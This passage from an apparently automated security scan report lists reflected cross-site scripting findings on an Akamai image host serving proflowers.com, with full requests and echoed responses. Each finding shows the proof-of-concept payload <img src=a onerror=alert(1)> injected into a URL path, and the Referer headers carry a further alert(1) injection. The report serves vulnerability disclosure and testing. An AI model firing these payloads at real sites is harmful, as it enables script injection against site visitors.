Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:23 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtories4_pnk10_PF520ee<img src=a onerror=alert(1)>73aa06e9372
4.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6d67c<img%20src%3da%20onerror%3dalert(1)>ec1cb1d74be was submitted in the REST URL parameter 9. This input was echoed as 6d67c<img src=a onerror=alert(1)>ec1cb1d74be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu_pnk10_TEST_PF6d67c<img%20src%3da%20onerror%3dalert(1)>ec1cb1d74be?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:16 GMT
Connection: close

Unable to find /ProvideCommerce/LLYassrtperu_pnk10_TEST_PF6d67c<img src=a onerror=alert(1)>ec1cb1d74be
4.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4e4c1<img%20src%3da%20onerror%3dalert(1)>b4e9f2fec83 was submitted in the REST URL parameter 9. This input was echoed as 4e4c1<img src=a onerror=alert(1)>b4e9f2fec83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtories_pnk11_PF4e4c1<img%20src%3da%20onerror%3dalert(1)>b4e9f2fec83?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxassrtories_pnk11_PF4e4c1<img src=a onerror=alert(1)>b4e9f2fec83
4.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c3599<img%20src%3da%20onerror%3dalert(1)>d8063d74a3a was submitted in the REST URL parameter 9. This input was echoed as c3599<img src=a onerror=alert(1)>d8063d74a3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxassrtperu_tv11_PFc3599<img%20src%3da%20onerror%3dalert(1)>d8063d74a3a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:15 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxassrtperu_tv11_PFc3599<img src=a onerror=alert(1)>d8063d74a3a
4.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 65a8a<img%20src%3da%20onerror%3dalert(1)>8a6382d71f6 was submitted in the REST URL parameter 9. This input was echoed as 65a8a<img src=a onerror=alert(1)>8a6382d71f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYdlxstargazer_pnk11_PF65a8a<img%20src%3da%20onerror%3dalert(1)>8a6382d71f6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:09 GMT
Connection: close

Unable to find /ProvideCommerce/LLYdlxstargazer_pnk11_PF65a8a<img src=a onerror=alert(1)>8a6382d71f6
4.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c83bd<img%20src%3da%20onerror%3dalert(1)>50f64b94a0e was submitted in the REST URL parameter 9. This input was echoed as c83bd<img src=a onerror=alert(1)>50f64b94a0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYroyalspring_pnk10_PFc83bd<img%20src%3da%20onerror%3dalert(1)>50f64b94a0e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:02 GMT
Connection: close

Unable to find /ProvideCommerce/LLYroyalspring_pnk10_PFc83bd<img src=a onerror=alert(1)>50f64b94a0e
4.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 312d2<img%20src%3da%20onerror%3dalert(1)>4ee798bbca6 was submitted in the REST URL parameter 9. This input was echoed as 312d2<img src=a onerror=alert(1)>4ee798bbca6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ312d2<img%20src%3da%20onerror%3dalert(1)>4ee798bbca6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:26 GMT
Connection: close

Unable to find /ProvideCommerce/M519BRR1001210_SQ312d2<img src=a onerror=alert(1)>4ee798bbca6
4.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 664e8<img%20src%3da%20onerror%3dalert(1)>005d15718af was submitted in the REST URL parameter 9. This input was echoed as 664e8<img src=a onerror=alert(1)>005d15718af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF664e8<img%20src%3da%20onerror%3dalert(1)>005d15718af?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/MBQ15orchpurp10_PF664e8<img src=a onerror=alert(1)>005d15718af
4.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 613be<img%20src%3da%20onerror%3dalert(1)>a8ba2d3b6ff was submitted in the REST URL parameter 9. This input was echoed as 613be<img src=a onerror=alert(1)>a8ba2d3b6ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_pnk11_PF613be<img%20src%3da%20onerror%3dalert(1)>a8ba2d3b6ff?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/MBQallthefrills_pnk11_PF613be<img src=a onerror=alert(1)>a8ba2d3b6ff
4.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dc33a<img%20src%3da%20onerror%3dalert(1)>e55e170119a was submitted in the REST URL parameter 9. This input was echoed as dc33a<img src=a onerror=alert(1)>e55e170119a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtgerb_coralpeony11_PFdc33a<img%20src%3da%20onerror%3dalert(1)>e55e170119a?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:57 GMT
Connection: close

Unable to find /ProvideCommerce/MBQassrtgerb_coralpeony11_PFdc33a<img src=a onerror=alert(1)>e55e170119a
4.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a266c<img%20src%3da%20onerror%3dalert(1)>f1cc77c07c5 was submitted in the REST URL parameter 9. This input was echoed as a266c<img src=a onerror=alert(1)>f1cc77c07c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQassrtmums11_catalog_PFa266c<img%20src%3da%20onerror%3dalert(1)>f1cc77c07c5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:03 GMT
Connection: close

Unable to find /ProvideCommerce/MBQassrtmums11_catalog_PFa266c<img src=a onerror=alert(1)>f1cc77c07c5
4.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8217f<img%20src%3da%20onerror%3dalert(1)>bd7ea8ed212 was submitted in the REST URL parameter 9. This input was echoed as 8217f<img src=a onerror=alert(1)>bd7ea8ed212 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF8217f<img%20src%3da%20onerror%3dalert(1)>bd7ea8ed212?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:48 GMT
Connection: close

Unable to find /ProvideCommerce/MBQcarnival10_PF8217f<img src=a onerror=alert(1)>bd7ea8ed212
4.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fe029<img%20src%3da%20onerror%3dalert(1)>0534e1dcbe6 was submitted in the REST URL parameter 9. This input was echoed as fe029<img src=a onerror=alert(1)>0534e1dcbe6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PFfe029<img%20src%3da%20onerror%3dalert(1)>0534e1dcbe6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=86&hei=100 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:27 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxhugskiss_rbyg11_PFfe029<img src=a onerror=alert(1)>0534e1dcbe6
4.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e3e3e<img%20src%3da%20onerror%3dalert(1)>91af06a583c was submitted in the REST URL parameter 9. This input was echoed as e3e3e<img src=a onerror=alert(1)>91af06a583c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxjoyfulbouquet09_PFe3e3e<img%20src%3da%20onerror%3dalert(1)>91af06a583c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxjoyfulbouquet09_PFe3e3e<img src=a onerror=alert(1)>91af06a583c
4.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload cd0b9<img%20src%3da%20onerror%3dalert(1)>27b564570ad was submitted in the REST URL parameter 9. This input was echoed as cd0b9<img src=a onerror=alert(1)>27b564570ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpinksapp_pnk10_2_PFcd0b9<img%20src%3da%20onerror%3dalert(1)>27b564570ad?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:10 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxpinksapp_pnk10_2_PFcd0b9<img src=a onerror=alert(1)>27b564570ad
4.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fbefa<img%20src%3da%20onerror%3dalert(1)>c7f3acc65e was submitted in the REST URL parameter 9. This input was echoed as fbefa<img src=a onerror=alert(1)>c7f3acc65e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PFfbefa<img%20src%3da%20onerror%3dalert(1)>c7f3acc65e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 107
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:04 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxpurelyspec_purpletrmp11_PFfbefa<img src=a onerror=alert(1)>c7f3acc65e
4.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF

Issue detail

